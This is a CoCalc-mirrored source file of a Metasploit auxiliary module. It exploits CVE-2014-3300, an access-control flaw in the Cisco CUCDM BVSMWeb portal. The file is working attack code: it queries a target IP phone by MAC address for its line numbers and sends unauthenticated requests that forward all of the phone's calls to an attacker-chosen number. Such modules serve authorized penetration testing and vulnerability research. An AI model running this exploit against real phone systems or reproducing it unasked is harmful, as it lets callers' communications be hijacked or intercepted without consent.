CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/voip/cisco_cucdm_call_forward.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'rexml/document'67class MetasploitModule < Msf::Auxiliary8include Msf::Exploit::Remote::HttpClient910def initialize(info={})11super(update_info(info,12'Name' => 'Viproy CUCDM IP Phone XML Services - Call Forwarding Tool',13'Description' => %q{14The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager15(CDM) 10 does not properly implement access control, which allows remote attackers to16modify user information. This module exploits the vulnerability to configure unauthorized17call forwarding.18},19'Author' => 'fozavci',20'References' =>21[22['CVE', '2014-3300'],23['BID', '68331']24],25'License' => MSF_LICENSE,26'Actions' =>27[28[ 'Forward', { 'Description' => 'Enabling the call forwarding for the MAC address' } ],29[ 'Info', { 'Description' => 'Retrieving the call forwarding information for the MAC address' } ]30],31'DefaultAction' => 'Info'32))3334register_options(35[36OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),37OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),38OptString.new('FORWARDTO', [ true, 'Number to forward all calls', '007']),39OptString.new('FINTNUMBER', [ false, 'FINTNUMBER of IP Phones, required for multiple lines'])40])41end4243def run44case action.name.upcase45when 'INFO'46get_info47when 'FORWARD'48forward_calls49end50end5152def get_info53uri = normalize_uri(target_uri.to_s)54mac = datastore["MAC"]5556print_status("Getting fintnumbers and display names of the IP phone")5758res = send_request_cgi(59{60'uri' => normalize_uri(uri, 'showcallfwd.cgi'),61'method' => 'GET',62'vars_get' => {63'device' => "SEP#{mac}"64}65})6667unless res && res.code == 200 && res.body && res.body.to_s =~ /fintnumber/68print_error("Target appears not vulnerable!")69print_status("#{res}")70return []71end7273doc = REXML::Document.new(res.body)74lines = []75fint_numbers = []7677list = doc.root.get_elements('MenuItem')7879list.each do |lst|80xlist = lst.get_elements('Name')81xlist.each {|l| lines << "#{l[0]}"}82xlist = lst.get_elements('URL')83xlist.each {|l| fint_numbers << "#{l[0].to_s.split('fintnumber=')[1]}" }84end8586lines.size.times do |i|87print_status("Display Name: #{lines[i]}, Fintnumber: #{fint_numbers[i]}")88end8990fint_numbers91end9293def forward_calls94# for a specific FINTNUMBER redirection95uri = normalize_uri(target_uri.to_s)96forward_to = datastore["FORWARDTO"]97mac = datastore["MAC"]9899if datastore['FINTNUMBER']100fint_numbers = [datastore['FINTNUMBER']]101else102fint_numbers = get_info103end104105if fint_numbers.empty?106print_error("FINTNUMBER required to forward calls")107return108end109110fint_numbers.each do |fintnumber|111112print_status("Sending call forward request for #{fintnumber}")113114send_request_cgi(115{116'uri' => normalize_uri(uri, 'phonecallfwd.cgi'),117'method' => 'GET',118'vars_get' => {119'cfoption' => 'CallForwardAll',120'device' => "SEP#{mac}",121'ProviderName' => 'NULL',122'fintnumber' => "#{fintnumber}",123'telno1' => "#{forward_to}"124}125})126127res = send_request_cgi(128{129'uri' => normalize_uri(uri, 'showcallfwdperline.cgi'),130'method' => 'GET',131'vars_get' => {132'device' => "SEP#{mac}",133'fintnumber' => "#{fintnumber}"134}135})136137if res && res.body && res.body && res.body.to_s =~ /CFA/138print_good("Call forwarded successfully for #{fintnumber}")139else140print_error("Call forward failed")141end142end143end144end145146147